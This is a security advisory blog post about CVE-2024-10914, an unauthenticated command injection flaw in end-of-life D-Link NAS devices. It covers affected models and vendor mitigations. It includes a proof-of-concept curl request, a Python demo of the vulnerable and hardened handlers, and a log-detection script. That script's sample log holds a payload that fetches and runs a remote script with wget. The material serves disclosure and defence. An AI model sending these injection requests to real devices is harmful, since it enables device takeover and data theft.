
Overview 

A recently identified command injection vulnerability in D-Link network-attached storage (NAS) devices exposes over 61,000 internet-connected units to potential exploitation.  

The flaw, tracked as CVE-2024-10914, allows unauthenticated attackers to inject arbitrary commands by exploiting the name parameter in the cgi_user_add command. 

The vulnerability affects legacy D-Link NAS devices, mostly deployed by small businesses, and carries a critical CVSS score of 9.2, so mitigation cannot wait. 

This vulnerability is especially concerning as D-Link has classified these devices as end-of-life (EOL) and end-of-service (EOS), meaning they will no longer receive security updates or patches. D-Link has recommended that users retire affected devices or, at minimum, isolate them from public internet access. 

Affected Devices and Vulnerability Scope 

The CVE-2024-10914 command injection vulnerability impacts several D-Link NAS models that are no longer supported. The affected devices include: 

  • DNS-320 – Version 1.00 
  • DNS-320LW – Version 1.01.0914.2012 
  • DNS-325 – Versions 1.01, 1.02 
  • DNS-340L – Version 1.08 

The vulnerability lies in the account_mgr.cgi script, specifically in its handling of the name parameter when the cgi_user_add command is requested. The parameter value reaches the system shell without adequate sanitization, so an attacker can terminate the intended command and append arbitrary shell commands, potentially compromising all data on the device. 

In a scan run on the FOFA search platform, security researcher NetSecFish found more than 61,000 affected devices exposed to the internet at unique IP addresses worldwide, which shows how widespread the exposure is. 

Exploitation Details 

Exploiting CVE-2024-10914 requires minimal technical knowledge. Attackers can craft a simple HTTP GET request to the vulnerable device’s IP address, embedding malicious commands within the name parameter, as shown below: 

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

The above request invokes the cgi_user_add function with the attacker's shell command embedded in the name value. The %27 sequences are URL-encoded single quotes: they break out of the quoting the script applies to the name value so that the embedded command runs as a separate shell statement, giving the attacker unauthorized control over the device. This vulnerability (CWE-77) poses a severe risk, as command injection can lead to complete device takeover, unauthorized access to stored data, and lateral movement within the network. 
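To make the mechanics concrete, the following Python is an added example and is not D-Link's code or the researcher's proof of concept. It models the flawed pattern (a decoded request value spliced into a single-quoted command line that is handed to /bin/sh) next to a hardened handler, and feeds both the payload shape from the curl request above. The command template, the use of echo in place of the real user-management binary, and the username allow-list are all assumptions made for the demonstration.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed query string in the shape of the public PoC; "echo INJECTED"
# stands in for the attacker's <INJECTED_SHELL_COMMAND>.
POC_QUERY = "cmd=cgi_user_add&name=%27;echo%20INJECTED;%27"


def params_from_query(query: str) -> dict:
    """URL-decode a query string the way the CGI would see it.

    Only '&' separates pairs: the literal ';' in the payload stays inside the
    value, which is exactly what lets it reach the shell.
    """
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def vulnerable_user_add(name: str) -> str:
    """Assumed flawed pattern (not D-Link's code): the decoded value is spliced
    into a single-quoted command line that /bin/sh then parses."""
    cmd = f"echo adding user '{name}'"
    # With name = ';echo INJECTED;' between the PoC's %27 quotes, the shell
    # receives:  echo adding user '';echo INJECTED;''
    # i.e. three statements, the middle one chosen by the attacker.
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


# Assumed allow-list: a conservative POSIX-style username.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def hardened_user_add(name: str, authenticated: bool) -> str:
    """Hardened handler: require an authenticated session, allow-list the
    value, and pass it as its own argv element so no shell ever parses it."""
    if not authenticated:
        raise PermissionError("cgi_user_add requires an authenticated session")
    if not USERNAME_RE.fullmatch(name):
        raise ValueError(f"rejected username {name!r}")
    proc = subprocess.run(["echo", "adding user", name],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def demo() -> tuple:
    name = params_from_query(POC_QUERY)["name"]   # "';echo INJECTED;'"
    vuln_out = vulnerable_user_add(name)           # stdout contains INJECTED
    try:
        hardened_user_add(name, authenticated=True)
        hard_out = "accepted"
    except ValueError as err:
        hard_out = str(err)                        # rejected by the allow-list
    return name, vuln_out, hard_out


if __name__ == "__main__":
    for item in demo():
        print(repr(item))
```

The hardened version fixes the bug at two layers: the allow-list rejects the payload outright, and even a value that slipped past it could not be reinterpreted by a shell, because there is no shell in the call path. Neither layer is a substitute for the authentication check, since the vulnerable endpoint is reachable without one.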

D-Link’s Response and Recommendations 

D-Link released an advisory acknowledging the vulnerability and confirming that affected devices have reached end-of-life (EOL) status. As a result, they no longer receive firmware updates or security patches, meaning that no official fix will be provided.  

“If a product has reached the End of Support (“EOS”) or End of Life (“EOL”), it typically does not receive further extended support or development. Typically, D-Link cannot resolve device or firmware issues for these products since all development and customer support have ceased,” the company said. 

D-Link advises users to replace these NAS devices with more secure and supported models to mitigate the risk of exploitation. 

For users who cannot immediately retire these devices, D-Link has issued the following recommendations: 

  1. Isolate Vulnerable NAS Devices: Disconnect the affected NAS devices from the public internet to prevent external exploitation. 
  2. Restrict Access: Limit access to the device by configuring firewall rules or network access controls that restrict traffic to trusted internal networks only. 
  3. Update Access Credentials: Frequently update and strengthen device passwords to mitigate potential unauthorized access and ensure encryption is enabled for wireless connections. 
  4. Consider Third-Party Firmware: For advanced users, third-party firmware may provide additional security updates, though it voids any remaining warranty and is unsupported by D-Link. 

Security Implications and Best Practices 

With over 61,000 potentially exposed devices and no patch available, this vulnerability has significant implications. Organizations using these NAS devices to store or transfer sensitive information are advised to take immediate action to mitigate potential breaches.

Beyond D-Link’s recommendations, organizations can adopt additional best practices to minimize their exposure to this risk: 

  • Network Segmentation: Place vulnerable devices in segmented network zones to prevent attackers from moving laterally if they gain initial access. 
  • Regular Vulnerability Scanning: Implement frequent scanning to identify exposed or vulnerable devices within the network. 
  • Monitor Network Traffic: Set up network monitoring to detect unusual traffic patterns or access attempts, such as requests to account_mgr.cgi that carry shell metacharacters in the name parameter, which could indicate exploitation. 
  • Cybersecurity Awareness: Inform employees and network administrators about this vulnerability to reinforce secure practices for managing NAS devices. 
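The monitoring and scanning items above are concrete enough to script. The following Python is an added example, not part of the original article or of any vendor tooling: it reads access-log lines (common log format is assumed; a reverse proxy or network sensor in front of the NAS would produce similar records), URL-decodes each request to account_mgr.cgi, and flags the CVE-2024-10914 pattern, that is, a cgi_user_add request whose name parameter contains shell metacharacters. It also reports any other use of that CGI from outside an assumed management network (192.0.2.0/24 is a placeholder). The log lines are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format (not real captures). The
# first and third carry the CVE-2024-10914 pattern, the second is a legitimate
# request from an administrator on the LAN, the fourth is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2024:13:05:11 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 200 512
192.0.2.10 - - [10/Nov/2024:13:06:02 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=bob HTTP/1.1" 200 340
203.0.113.7 - - [10/Nov/2024:13:07:45 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=x%60wget%20http%3A%2F%2F198.51.100.5%2Fa.sh%60 HTTP/1.1" 200 512
192.0.2.10 - - [10/Nov/2024:13:08:19 +0000] "GET /web/index.html HTTP/1.1" 200 1200
"""

# Assumed management network; any other source touching the CGI is suspect.
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]
VULN_PATH = "/cgi-bin/account_mgr.cgi"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Characters that let a value break out of a quoted shell argument.
SHELL_META = re.compile(r"[;|&`$(){}<>\n'\"]")


def query_params(query: str) -> dict:
    """Decode k=v&k=v. Deliberately does not split on ';' (it is the payload)."""
    return {unquote_plus(k): unquote_plus(v)
            for k, _, v in (p.partition("=") for p in query.split("&") if p)}


def classify(ip: str, params: dict) -> str:
    """Severity for one account_mgr.cgi request, or '' when it looks benign."""
    name = params.get("name", "")
    if params.get("cmd") == "cgi_user_add" and SHELL_META.search(name):
        return "critical"      # shell metacharacters in the injectable field
    addr = ipaddress.ip_address(ip)
    if not any(addr in net for net in TRUSTED_NETS):
        return "suspicious"    # admin CGI reached from outside the mgmt LAN
    return ""


def analyze(log_text: str) -> list:
    """Return one finding per flagged request, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if path != VULN_PATH:
            continue
        params = query_params(query)
        severity = classify(m["ip"], params)
        if severity:
            hits.append({"src": m["ip"], "ts": m["ts"], "severity": severity,
                         "name": params.get("name", ""), "status": m["status"]})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(f'{hit["severity"]:10} {hit["src"]:15} {hit["ts"]} name={hit["name"]!r}')
```

Decoding before matching matters: a rule that looks for a literal single quote in the raw request line misses the %27 form used in the public proof of concept, and one that splits query strings on ';' would cut the payload in half before inspecting it. A 200 status on a flagged request should be treated as probable compromise rather than an attempt, because the vulnerable script returns normally after running the injected command.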

Conclusion 

CVE-2024-10914 represents a critical risk to D-Link NAS device users, particularly as these devices will not receive security patches due to their EOL/EOS status. Immediate action is necessary to mitigate this risk, either by retiring affected devices or by enforcing strict access controls. For businesses and individuals relying on these legacy devices, upgrading to secure, supported hardware is the most effective solution to maintain data integrity and safeguard against potential threats. 

References: 

https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10413
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07

The post No Fix for Critical Command Injection Vulnerability in Legacy D-Link NAS Devices appeared first on Cyble.